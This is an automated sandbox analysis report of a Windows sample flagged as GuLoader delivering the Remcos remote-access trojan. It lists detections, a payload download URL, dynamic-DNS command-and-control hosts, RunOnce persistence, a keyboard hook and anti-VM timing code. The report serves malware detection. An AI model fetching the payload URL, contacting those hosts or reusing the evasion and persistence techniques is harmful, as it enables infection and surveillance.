Play interactive tour

Edit tour

Windows Analysis Report pRcHGlVekw.exe

Overview

General Information

Sample Name:	pRcHGlVekw.exe
Analysis ID:	458794
MD5:	d2cb32f7c7f384b4baa8dd13d6b5bbab
SHA1:	355acb5af5caaeb59fd7c9e0a54b501c24d47919
SHA256:	2bd846bdda945dc48a21c9bda1497feb9e67df8cfb024cc8669041490c7c9a90
Tags:	32exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious values (likely registry only malware)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

pRcHGlVekw.exe (PID: 3164 cmdline: 'C:\Users\user\Desktop\pRcHGlVekw.exe' MD5: D2CB32F7C7F384B4BAA8DD13D6B5BBAB)

pRcHGlVekw.exe (PID: 1724 cmdline: 'C:\Users\user\Desktop\pRcHGlVekw.exe' MD5: D2CB32F7C7F384B4BAA8DD13D6B5BBAB)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

ReversingLabs: Detection: 17%

Multi AV Scanner detection for submitted file

Show sources

Source: pRcHGlVekw.exe

ReversingLabs: Detection: 17%

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: pRcHGlVekw.exe

Joe Sandbox ML: detected

Source: pRcHGlVekw.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: wealthyrem.ddns.net

Source: global traffic

TCP traffic: 192.168.2.3:49737 -> 194.5.97.128:39200

Source: Joe Sandbox View	IP Address: 194.5.97.128 194.5.97.128
Source: Joe Sandbox View	IP Address: 101.99.94.119 101.99.94.119

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\pRcHGlVekw.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218929D NtProtectVirtualMemory,	1_2_0218929D
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218435F NtWriteVirtualMemory,	1_2_0218435F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021859E6 NtAllocateVirtualMemory,	1_2_021859E6
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185A22 NtAllocateVirtualMemory,	1_2_02185A22
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218486E NtWriteVirtualMemory,	1_2_0218486E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021846AC NtWriteVirtualMemory,	1_2_021846AC
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184CFA NtWriteVirtualMemory,	1_2_02184CFA
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218914B NtProtectVirtualMemory,	1_2_0218914B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185564 NtWriteVirtualMemory,TerminateProcess,	1_2_02185564
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181766 NtWriteVirtualMemory,	1_2_02181766
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183DA0 NtWriteVirtualMemory,	1_2_02183DA0

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218561A	1_2_0218561A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218226F	1_2_0218226F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180E63	1_2_02180E63
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02189695	1_2_02189695
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021806BF	1_2_021806BF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218435F	1_2_0218435F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188817	1_2_02188817
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183A2B	1_2_02183A2B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182021	1_2_02182021
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188053	1_2_02188053
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180248	1_2_02180248
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218486E	1_2_0218486E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218086F	1_2_0218086F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185E60	1_2_02185E60
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182A67	1_2_02182A67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185E67	1_2_02185E67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187C9A	1_2_02187C9A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021896A8	1_2_021896A8
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021846AC	1_2_021846AC
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021886D9	1_2_021886D9
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180CDF	1_2_02180CDF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182EC2	1_2_02182EC2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184CFA	1_2_02184CFA
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021810F0	1_2_021810F0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180CE4	1_2_02180CE4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183B1F	1_2_02183B1F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184111	1_2_02184111
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181113	1_2_02181113
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181136	1_2_02181136
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183123	1_2_02183123
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182B4B	1_2_02182B4B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183944	1_2_02183944
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182F76	1_2_02182F76
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185D6E	1_2_02185D6E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188960	1_2_02188960
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185564	1_2_02185564
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181766	1_2_02181766
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181BBB	1_2_02181BBB
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183DA0	1_2_02183DA0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021879D6	1_2_021879D6
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021807F2	1_2_021807F2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180DF4	1_2_02180DF4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021803F6	1_2_021803F6

Source: pRcHGlVekw.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pRcHGlVekw.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UNDERDEVELOPED.exe.16.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UNDERDEVELOPED.exe.16.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: pRcHGlVekw.exe, 00000001.00000000.219062533.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000001.00000002.344452128.0000000002090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000002.1306296984.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000000.341877354.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe

Source: pRcHGlVekw.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@175/3

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Local\Temp\~DF4931134DE445F613.TMP

Jump to behavior

Source: pRcHGlVekw.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: pRcHGlVekw.exe

ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File read: C:\Users\user\Desktop\pRcHGlVekw.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'	Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_00407108 push ebp; retf	1_2_00407109
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A033 push ds; retf	1_2_0218A036
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A037 push ds; retf	1_2_0218A03A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A02B push ds; retf	1_2_0218A02E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A02F push ds; retf	1_2_0218A032
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A027 push ds; retf	1_2_0218A02A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A037 push ds; retf	16_2_0056A03A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A033 push ds; retf	16_2_0056A036
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A027 push ds; retf	16_2_0056A02A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A02F push ds; retf	16_2_0056A032
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A02B push ds; retf	16_2_0056A02E

Source: initial sample	Static PE information: section name: .text entropy: 7.08042704515
Source: initial sample	Static PE information: section name: .text entropy: 7.08042704515

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs			Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\UNDERDEVELOPED.EXE\HOMOTYPYSET W = CREATEOBJECT("WSCRIPT.SHELL")
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\UNDERDEVELOPED.EXE\HOMOTYPYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEDRAWSPAN

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000002187EBB second address: 0000000002187EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000002187FF6 second address: 0000000002187FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000000567EBB second address: 0000000000567EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000000567FF6 second address: 0000000000567FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02187EB3 rdtsc

1_2_02187EB3

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Window / User API: foregroundWindowGot 547

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624	Thread sleep count: 276 > 30			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624	Thread sleep time: -138000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Last function: Thread delayed
